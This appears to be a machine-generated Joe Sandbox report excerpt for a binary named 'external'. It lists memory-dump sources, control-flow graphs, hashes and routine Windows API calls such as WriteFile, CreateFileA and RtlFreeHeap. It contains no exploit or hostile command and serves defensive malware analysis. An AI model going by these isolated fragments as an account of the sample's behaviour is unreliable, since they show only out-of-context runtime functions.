                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                          • String ID:
                                                                                                          • API String ID: 1703294689-0
                                                                                                          • Opcode ID: adf98f0d43bf55f5201f4648a19a635eb37be05197d02c51d775a2d43233b7ea
                                                                                                          • Instruction ID: 3d7d0f6b987c7f5180aa20b9f9ddc2c1d7772ec0d31600c7a1ed578108cb79f0
                                                                                                          • Opcode Fuzzy Hash: adf98f0d43bf55f5201f4648a19a635eb37be05197d02c51d775a2d43233b7ea
                                                                                                          • Instruction Fuzzy Hash: 92D09E7110010CEBCF26AF60DC0D8893FAAEF40351B04C211B949561B1DF799D93DA44

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 223 704cf2-704d17 224 704d20-704d28 223->224 225 704d19-704d1b 223->225 227 704d50-704d54 224->227 228 704d2a-704d34 224->228 226 704e12-704e1f call 702303 225->226 229 704d5a-704d69 call 7053c3 227->229 230 704e0c 227->230 228->227 232 704d36-704d4b 228->232 237 704d71-704da6 229->237 238 704d6b-704d6f 229->238 234 704e11 230->234 232->234 234->226 244 704dd2-704dda 237->244 245 704da8-704dab 237->245 239 704db9 call 704915 238->239 242 704dbe-704dd0 239->242 242->234 246 704ddc-704ded call 71088d 244->246 247 704def-704e0a 244->247 245->244 248 704dad-704db1 245->248 246->230 246->247 247->234 248->230 250 704db3-704db6 248->250 250->239
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: &p
                                                                                                          • API String ID: 0-2011850372
                                                                                                          • Opcode ID: 7fc8182b1e413a14ea73e2eb1caefd49863e6fc410e9f428675dab6a255dbf4e
                                                                                                          • Instruction ID: 76b229d86481a1717abd380890e4acedb8903b43b69ef7784678f9dd13958341
                                                                                                          • Opcode Fuzzy Hash: 7fc8182b1e413a14ea73e2eb1caefd49863e6fc410e9f428675dab6a255dbf4e
                                                                                                          • Instruction Fuzzy Hash: 40418171A0011AEBCF14DFA8C4949EDB7F9FF08314B544269E641E7690E734E951CBA0

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 252 703a58-703a72 253 703a74-703a76 252->253 254 703a7b-703a83 252->254 255 703b54-703b61 call 702303 253->255 256 703aa4-703aa8 254->256 257 703a85-703a8f 254->257 259 703b50 256->259 260 703aae-703abf call 7042e8 256->260 257->256 262 703a91-703aa2 257->262 264 703b53 259->264 268 703ac1-703ac5 260->268 269 703ac7-703afb 260->269 266 703b1d-703b1f 262->266 264->255 266->264 270 703b0e call 70340f 268->270 275 703b21-703b29 269->275 276 703afd-703b00 269->276 273 703b13-703b1a 270->273 273->266 277 703b2b-703b3c call 71088d 275->277 278 703b3e-703b4e 275->278 276->275 279 703b02-703b06 276->279 277->259 277->278 278->264 279->259 281 703b08-703b0b 279->281 281->270
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: &p
                                                                                                          • API String ID: 0-2011850372
                                                                                                          • Opcode ID: 8c04537287bcfe70447292824bfe50cd64a77917bf8b9d7f14654409e007d55f
                                                                                                          • Instruction ID: f484c50da3c67b40d4b0de3d1b693235ff50981d7398b5ae6b1989a05838a2d2
                                                                                                          • Opcode Fuzzy Hash: 8c04537287bcfe70447292824bfe50cd64a77917bf8b9d7f14654409e007d55f
                                                                                                          • Instruction Fuzzy Hash: 07317F72A0011AEFCF14DE68C8949E9B7ECBF09324B14436AE512E72D0D725EE44CBA0

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                            • Part of subcall function 00702B03: GetModuleHandleExW.KERNEL32(00000002,00000000,006FE5B1,?,?,00702AC6,?,?,00702A97,?,?,?,006FE5B1), ref: 00702B0F
                                                                                                          • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,48E58DFA,?,?,?,00723374,000000FF), ref: 00702BF9
                                                                                                            • Part of subcall function 006FB920: std::_Throw_Cpp_error.LIBCPMT ref: 006FB94C
                                                                                                            • Part of subcall function 006FB920: std::_Throw_Cpp_error.LIBCPMT ref: 006FB968
                                                                                                            • Part of subcall function 00705C60: ReleaseSRWLockExclusive.KERNEL32(?,?,?,006FB9E9,?,006FFD92), ref: 00705C75
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Cpp_errorThrow_std::_$CallbackExclusiveFreeHandleLibraryLockModuleReleaseReturnsWhen
                                                                                                          • String ID: &p
                                                                                                          • API String ID: 1423221283-2011850372
                                                                                                          • Opcode ID: 1c9bbb2599d40c0fb4a2fa7e44725c654507881bc1c51c4b0f1557a061c161c9
                                                                                                          • Instruction ID: 025afa5c56248fad901520e6f375c8f99d405a939dd94c83d17ecd4833680deb
                                                                                                          • Opcode Fuzzy Hash: 1c9bbb2599d40c0fb4a2fa7e44725c654507881bc1c51c4b0f1557a061c161c9
                                                                                                          • Instruction Fuzzy Hash: F811E673600604DBDB256F55EC0DA6F77E5EB41B20F14461AF401966E2DF3CDC02CA94

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 006F50DB
                                                                                                            • Part of subcall function 0070277A: _Yarn.LIBCPMT ref: 0070279A
                                                                                                            • Part of subcall function 0070277A: _Yarn.LIBCPMT ref: 007027BE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Yarn$LockitLockit::_std::_
                                                                                                          • String ID: bad locale name
                                                                                                          • API String ID: 360232963-1405518554
                                                                                                          • Opcode ID: 57eafcaddfe0955659460e80a3b74efe6bd9503c214806f670597b91a1fe55ba
                                                                                                          • Instruction ID: 217f6b65b36ef73254e8e2662c117cd6a251eda9cbd496039bdb6cb6044e999b
                                                                                                          • Opcode Fuzzy Hash: 57eafcaddfe0955659460e80a3b74efe6bd9503c214806f670597b91a1fe55ba
                                                                                                          • Instruction Fuzzy Hash: 7601C97090460CEBCB48FFE8C4956BDBBB1AF44308F44456DE74657382DA34AA90DB9A

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 334 71ad2d-71ad4f 335 71af42 334->335 336 71ad55-71ad57 334->336 339 71af44-71af48 335->339 337 71ad83-71ada6 336->337 338 71ad59-71ad78 call 70f3f8 336->338 341 71ada8-71adaa 337->341 342 71adac-71adb2 337->342 345 71ad7b-71ad7e 338->345 341->342 344 71adb4-71adc5 341->344 342->338 342->344 346 71adc7-71add5 call 719add 344->346 347 71add8-71ade8 call 71b05a 344->347 345->339 346->347 352 71ae31-71ae43 347->352 353 71adea-71adf0 347->353 354 71ae45-71ae4b 352->354 355 71ae9a-71aeba WriteFile 352->355 356 71adf2-71adf5 353->356 357 71ae19-71ae2f call 71b0d7 353->357 358 71ae86-71ae93 call 71b506 354->358 359 71ae4d-71ae50 354->359 362 71aec5 355->362 363 71aebc-71aec2 GetLastError 355->363 360 71ae00-71ae0f call 71b49e 356->360 361 71adf7-71adfa 356->361 379 71ae12-71ae14 357->379 378 71ae98 358->378 365 71ae72-71ae84 call 71b6ca 359->365 366 71ae52-71ae55 359->366 360->379 361->360 367 71aeda-71aedd 361->367 371 71aec8-71aed3 362->371 363->362 384 71ae6d-71ae70 365->384 374 71aee0-71aee2 366->374 375 71ae5b-71ae68 call 71b5e1 366->375 367->374 372 71aed5-71aed8 371->372 373 71af3d-71af40 371->373 372->367 373->339 380 71af10-71af1c 374->380 381 71aee4-71aee9 374->381 375->384 378->384 379->371 387 71af26-71af38 380->387 388 71af1e-71af24 380->388 385 71af02-71af0b call 70ebf0 381->385 386 71aeeb-71aefd 381->386 384->379 385->345 386->345 387->345 388->335 388->387
                                                                                                          APIs
                                                                                                            • Part of subcall function 0071B0D7: GetConsoleOutputCP.KERNEL32(48E58DFA,00000000,00000000,?), ref: 0071B13A
                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,0070A691,?,0070A8F3), ref: 0071AEB2
                                                                                                          • GetLastError.KERNEL32(?,0070A691,?,0070A8F3,?,0070A8F3,?,?,?,?,?,?,?,?,?,?), ref: 0071AEBC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 2915228174-0
                                                                                                          • Opcode ID: 04435cd4b388e17f9c14ae9000678eade47954b145ac93def0f619752271406c
                                                                                                          • Instruction ID: ecf10824498eb2ca250d163045263773f7e5be6208bbc85c5c88dd648d1de3c7
                                                                                                          • Opcode Fuzzy Hash: 04435cd4b388e17f9c14ae9000678eade47954b145ac93def0f619752271406c
                                                                                                          • Instruction Fuzzy Hash: 9B61C3B1901119BFDF11CFACD885EEEBBB9AF09304F140145E904A7296D33AD986CB61

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 391 71b506-71b55b call 706c90 394 71b5d0-71b5e0 call 702303 391->394 395 71b55d 391->395 397 71b563 395->397 399 71b569-71b56b 397->399 400 71b585-71b5aa WriteFile 399->400 401 71b56d-71b572 399->401 402 71b5c8-71b5ce GetLastError 400->402 403 71b5ac-71b5b7 400->403 404 71b574-71b57a 401->404 405 71b57b-71b583 401->405 402->394 403->394 406 71b5b9-71b5c4 403->406 404->405 405->399 405->400 406->397 407 71b5c6 406->407 407->394
                                                                                                          APIs
                                                                                                          • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,0071AE98,?,0070A8F3,?,?,?,00000000), ref: 0071B5A2
                                                                                                          • GetLastError.KERNEL32(?,0071AE98,?,0070A8F3,?,?,?,00000000,?,?,?,?,?,0070A691,?,0070A8F3), ref: 0071B5C8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 442123175-0
                                                                                                          • Opcode ID: ea9c06694d3f3ec0c13f4c5a54b7a16ef196c20578687e38fac61456dcd02289
                                                                                                          • Instruction ID: 67792e530422920386cd6ca0781d513d9cc3facbef32fdefd410aa64d0dc484f
                                                                                                          • Opcode Fuzzy Hash: ea9c06694d3f3ec0c13f4c5a54b7a16ef196c20578687e38fac61456dcd02289
                                                                                                          • Instruction Fuzzy Hash: 58218035A002199BCF15CF19DC909E9B7FAEB4C301F2441A9E946D7252E734EE928F64

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 006F48DF
                                                                                                            • Part of subcall function 006F4D90: std::_Lockit::_Lockit.LIBCPMT ref: 006F4DBE
                                                                                                            • Part of subcall function 006F4D90: std::_Lockit::~_Lockit.LIBCPMT ref: 006F4DE9
                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 006F49AB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                          • String ID:
                                                                                                          • API String ID: 593203224-0
                                                                                                          • Opcode ID: 48a8eaf38ba6d821cbccc72e079caf656305bafcd2322b97dbe56d43da59b50e
                                                                                                          • Instruction ID: e6f4bfc4f3f79ff357f2761da7298b7325dd246e3c3b51c1b466bb78f49d0b0e
                                                                                                          • Opcode Fuzzy Hash: 48a8eaf38ba6d821cbccc72e079caf656305bafcd2322b97dbe56d43da59b50e
                                                                                                          • Instruction Fuzzy Hash: 6B31D6B4D0020DDFCB00EFA8D4859AEBBF1FF08300F104569E956A7741EB34AA45CB85

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 438 714c19-714c1e 439 714c20-714c38 438->439 440 714c46-714c4f 439->440 441 714c3a-714c3e 439->441 443 714c61 440->443 444 714c51-714c54 440->444 441->440 442 714c40-714c44 441->442 445 714cbb-714cbf 442->445 448 714c63-714c70 GetStdHandle 443->448 446 714c56-714c5b 444->446 447 714c5d-714c5f 444->447 445->439 449 714cc5-714cc8 445->449 446->448 447->448 450 714c72-714c74 448->450 451 714c9d-714caf 448->451 450->451 453 714c76-714c7f GetFileType 450->453 451->445 452 714cb1-714cb4 451->452 452->445 453->451 454 714c81-714c8a 453->454 455 714c92-714c95 454->455 456 714c8c-714c90 454->456 455->445 457 714c97-714c9b 455->457 456->445 457->445
                                                                                                          APIs
                                                                                                          • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,00714B08,0072EBC0), ref: 00714C65
                                                                                                          • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00714B08,0072EBC0), ref: 00714C77
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileHandleType
                                                                                                          • String ID:
                                                                                                          • API String ID: 3000768030-0
                                                                                                          • Opcode ID: d090aea39d700aafcc98b8f4fed2b4c57219ab735edac02f31affe5482be1097
                                                                                                          • Instruction ID: 0412bddfcfbe34c9454bb682b21e3cfacfae2203b3d7bafe457eedecd6ef6005
                                                                                                          • Opcode Fuzzy Hash: d090aea39d700aafcc98b8f4fed2b4c57219ab735edac02f31affe5482be1097
                                                                                                          • Instruction Fuzzy Hash: 8311EE71205B414AC7308E3ECCC86A2BA95AB92330B38070AD1B6966F1D23CD9C6D2E4

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 458 70277a-702782 call 710cd7 460 702787-7027a4 call 7027e0 458->460 463 7027b0-7027c5 call 7027e0 460->463 464 7027a6-7027af call 710cd7 460->464 464->463
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Yarn
                                                                                                          • String ID:
                                                                                                          • API String ID: 1767336200-0
                                                                                                          • Opcode ID: 8cf4299cfad31ef390e30b0cc6a6882ef02ba7495ccbbdfe46edd34fd8258ae5
                                                                                                          • Instruction ID: 93f56e4d16a55d0b2fd75bb2d3fff4bfc25101b62a6cfaf46c970e96e13dee81
                                                                                                          • Opcode Fuzzy Hash: 8cf4299cfad31ef390e30b0cc6a6882ef02ba7495ccbbdfe46edd34fd8258ae5
                                                                                                          • Instruction Fuzzy Hash: 3EE0E533304214FBEB186A65AC56BB633D8DB44761F10022DFA0AD65C1ED64EC4486A5
                                                                                                          APIs
                                                                                                          • GetModuleHandleA.KERNEL32 ref: 006F1BC8
                                                                                                          • GetModuleFileNameA.KERNEL32 ref: 006F1BE8
                                                                                                            • Part of subcall function 006F1890: CreateFileA.KERNELBASE ref: 006F1913
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileModule$CreateHandleName
                                                                                                          • String ID:
                                                                                                          • API String ID: 2828212432-0
                                                                                                          • Opcode ID: 4b3255685053094f3ee0fc2fa8fe7df00b8279951d67f4f9e0fdbbf5d78f44a7
                                                                                                          • Instruction ID: 23bc0eefaa3fe2fdda401691e4d41fe3797ab356b4f9b43341fd5d8c7ee56009
                                                                                                          • Opcode Fuzzy Hash: 4b3255685053094f3ee0fc2fa8fe7df00b8279951d67f4f9e0fdbbf5d78f44a7
                                                                                                          • Instruction Fuzzy Hash: 57F01DB1904208CFCB50EF78D9493EDBBF4EB18300F4185ADD4C9D7240EA7899888F86
                                                                                                          APIs
                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,00717421,?,00000000,?,?,007170C1,?,00000007,?,?,00717A07,?,?), ref: 0071319D
                                                                                                          • GetLastError.KERNEL32(?,?,00717421,?,00000000,?,?,007170C1,?,00000007,?,?,00717A07,?,?), ref: 007131A8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 485612231-0
                                                                                                          • Opcode ID: e2d79816cec898e2da316de35ae57c75cb226de812edd6c202396d184b9c9434
                                                                                                          • Instruction ID: f794e3fbebb31ffe3b8de59d3edafd783dbe62464d713257f021072ad0bf87ee
                                                                                                          • Opcode Fuzzy Hash: e2d79816cec898e2da316de35ae57c75cb226de812edd6c202396d184b9c9434
                                                                                                          • Instruction Fuzzy Hash: 0EE0CD31100608F7DF212FA4EC0DF953BA9EB44751F148424FA0C960E4D63D8E85DB88
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
